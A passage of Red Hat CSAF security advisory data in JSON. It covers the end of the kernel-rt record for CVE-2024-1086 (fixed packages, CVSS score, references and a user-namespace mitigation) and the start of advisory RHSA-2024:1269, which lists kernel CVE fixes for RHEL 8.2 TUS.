"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-1086"
},
{
"category": "external",
"summary": "RHBZ#2262126",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2262126"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-1086",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-1086"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-1086",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1086"
},
{
"category": "external",
"summary": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f342de4e2f33e0e39165d8639387aa6c19dff660",
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f342de4e2f33e0e39165d8639387aa6c19dff660"
},
{
"category": "external",
"summary": "https://kernel.dance/f342de4e2f33e0e39165d8639387aa6c19dff660",
"url": "https://kernel.dance/f342de4e2f33e0e39165d8639387aa6c19dff660"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2024-01-31T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-02-28T12:36:50+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:1019"
},
{
"category": "workaround",
"details": "1. This flaw can be mitigated by preventing the affected netfilter (nf_tables) kernel module from being loaded. For instructions on how to blacklist a kernel module, please see https://access.redhat.com/solutions/41278.\n\n2. If the module cannot be disabled, on non-containerized deployments of Red Hat Enterprise Linux, the mitigation is to disable user namespaces:\n```\n# echo \"user.max_user_namespaces=0\" \u003e /etc/sysctl.d/userns.conf\n# sysctl -p /etc/sysctl.d/userns.conf\n```\nOn containerized deployments, such as Red Hat OpenShift Container Platform, do not use the second mitigation (disabling user namespaces) as the functionality is needed to be enabled. The first mitigation (blacklisting nf_tables) is still viable for containerized deployments, providing the environment is not using netfilter.",
"product_ids": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2024-05-30T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
"details": "Important"
}
],
"title": "kernel: nf_tables: use-after-free vulnerability in the nft_verdict_init() function"
}
]
}
rhsa-2024_1269
Vulnerability from csaf_redhat
Published
2024-03-12 11:49
Modified
2024-11-25 09:48
Summary
Red Hat Security Advisory: kernel-rt security update
Notes
Topic
An update for kernel-rt is now available for Red Hat Enterprise Linux 8.2 Telecommunications Update Service.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.
Security Fix(es):
* UAF in nftables when nft_set_lookup_global triggered after handling named and anonymous sets in batch requests (CVE-2023-3390)
* net/sched: sch_qfq component can be exploited if in qfq_change_agg function happens qfq_enqueue overhead (CVE-2023-3611)
* net/sched: sch_hfsc UAF (CVE-2023-4623)
* use-after-free in sch_qfq network scheduler (CVE-2023-4921)
* use after free in nvmet_tcp_free_crypto in NVMe (CVE-2023-5178)
* inactive elements in nft_pipapo_walk (CVE-2023-6817)
* out-of-bounds write in qfq_change_class function (CVE-2023-31436)
* nf_tables: stack-out-of-bounds-read in nft_byteorder_eval() (CVE-2023-35001)
* IGB driver inadequate buffer size for frames larger than MTU (CVE-2023-45871)
* ktls overwrites readonly memory pages when using function splice with a ktls socket as destination (CVE-2024-0646)
* nfp: use-after-free in area_cache_get() (CVE-2022-3545)
* vmwgfx: NULL pointer dereference in vmw_cmd_dx_define_query (CVE-2022-38096)
* Gather Data Sampling (GDS) side channel vulnerability (CVE-2022-40982)
* null-ptr-deref vulnerabilities in sl_tx_timeout in drivers/net/slip (CVE-2022-41858)
* fbcon: out-of-sync arrays in fbcon_mode_deleted due to wrong con2fb_map assignment (CVE-2023-38409)
* use-after-free in l2cap_sock_release in net/bluetooth/l2cap_sock.c (CVE-2023-40283)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for kernel-rt is now available for Red Hat Enterprise Linux 8.2 Telecommunications Update Service.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.\n\nSecurity Fix(es):\n\n* UAF in nftables when nft_set_lookup_global triggered after handling named and anonymous sets in batch requests (CVE-2023-3390)\n\n* net/sched: sch_qfq component can be exploited if in qfq_change_agg function happens qfq_enqueue overhead (CVE-2023-3611)\n\n* net/sched: sch_hfsc UAF (CVE-2023-4623)\n\n* use-after-free in sch_qfq network scheduler (CVE-2023-4921)\n\n* use after free in nvmet_tcp_free_crypto in NVMe (CVE-2023-5178)\n\n* inactive elements in nft_pipapo_walk (CVE-2023-6817)\n\n* out-of-bounds write in qfq_change_class function (CVE-2023-31436)\n\n* nf_tables: stack-out-of-bounds-read in nft_byteorder_eval() (CVE-2023-35001)\n\n* IGB driver inadequate buffer size for frames larger than MTU (CVE-2023-45871)\n\n* ktls overwrites readonly memory pages when using function splice with a ktls socket as destination (CVE-2024-0646)\n\n* nfp: use-after-free in area_cache_get() (CVE-2022-3545)\n\n* vmwgfx: NULL pointer dereference in vmw_cmd_dx_define_query (CVE-2022-38096)\n\n* Gather Data Sampling (GDS) side channel vulnerability (CVE-2022-40982)\n\n* null-ptr-deref vulnerabilities in sl_tx_timeout in drivers/net/slip (CVE-2022-41858)\n\n* fbcon: out-of-sync arrays in fbcon_mode_deleted due to wrong con2fb_map assignment (CVE-2023-38409)\n\n* use-after-free in l2cap_sock_release in net/bluetooth/l2cap_sock.c (CVE-2023-40283)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:1269",
"url": "https://access.redhat.com/errata/RHSA-2024:1269"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "https://access.redhat.com/solutions/7027704",
"url": "https://access.redhat.com/solutions/7027704"
},
{
"category": "external",
"summary": "2133452",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2133452"
},
{
"category": "external",
"summary": "2144379",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2144379"
},
{
"category": "external",
"summary": "2161310",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2161310"
},
{
"category": "external",
"summary": "2192671",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2192671"
},
{
"category": "external",
"summary": "2213260",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2213260"
},
{
"category": "external",
"summary": "2220892",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2220892"
},
{
"category": "external",
"summary": "2223949",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2223949"
},
{
"category": "external",
"summary": "2225191",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2225191"
},
{
"category": "external",
"summary": "2230042",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2230042"
},
{
"category": "external",
"summary": "2231800",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2231800"
},
{
"category": "external",
"summary": "2237757",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2237757"
},
{
"category": "external",
"summary": "2241924",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2241924"
},
{
"category": "external",
"summary": "2244723",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2244723"
},
{
"category": "external",
"summary": "2245514",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245514"
},
{
"category": "external",
"summary": "2253908",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2253908"
},
{
"category": "external",
"summary": "2255139",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2255139"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_1269.json"
}
],
"title": "Red Hat Security Advisory: kernel-rt security update",
"tracking": {
"current_release_date": "2024-11-25T09:48:39+00:00",
"generator": {
"date": "2024-11-25T09:48:39+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.1"
}
},
"id": "RHSA-2024:1269",
"initial_release_date": "2024-03-12T11:49:04+00:00",
"revision_history": [
{
"date": "2024-03-12T11:49:04+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-03-12T11:49:04+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-11-25T09:48:39+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux Real Time TUS (v. 8.2)",
"product": {
"name": "Red Hat Enterprise Linux Real Time TUS (v. 8.2)",
"product_id": "RT-8.2.0.Z.TUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhel_tus:8.2::realtime"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux Real Time for NFV TUS (v. 8.2)",
"product": {
"name": "Red Hat Enterprise Linux Real Time for NFV TUS (v. 8.2)",
"product_id": "NFV-8.2.0.Z.TUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhel_tus:8.2::nfv"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"product": {
"name": "kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"product_id": "kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt@4.18.0-193.128.1.rt13.179.el8_2?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"product": {
